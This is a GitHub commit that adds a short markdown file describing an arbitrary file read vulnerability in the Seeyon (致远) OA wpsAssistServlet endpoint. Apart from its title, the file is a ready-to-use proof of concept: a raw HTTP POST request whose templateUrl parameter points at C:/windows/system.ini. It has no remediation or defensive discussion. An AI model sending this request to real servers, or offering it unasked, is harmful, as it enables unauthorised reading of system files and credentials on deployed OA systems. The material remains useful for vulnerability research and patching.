Create 致远OA wpsAssistServlet任意文件读取漏洞.md

This commit is contained in:
wy876 2023-11-07 13:03:14 +08:00 committed by GitHub
parent 7ae091d695
commit 45b4b54418
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,14 @@
## 致远OA wpsAssistServlet任意文件读取漏洞
## POC
```
POST /seeyon/wpsAssistServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
flag=template&templateUrl=C:/windows/system.ini
```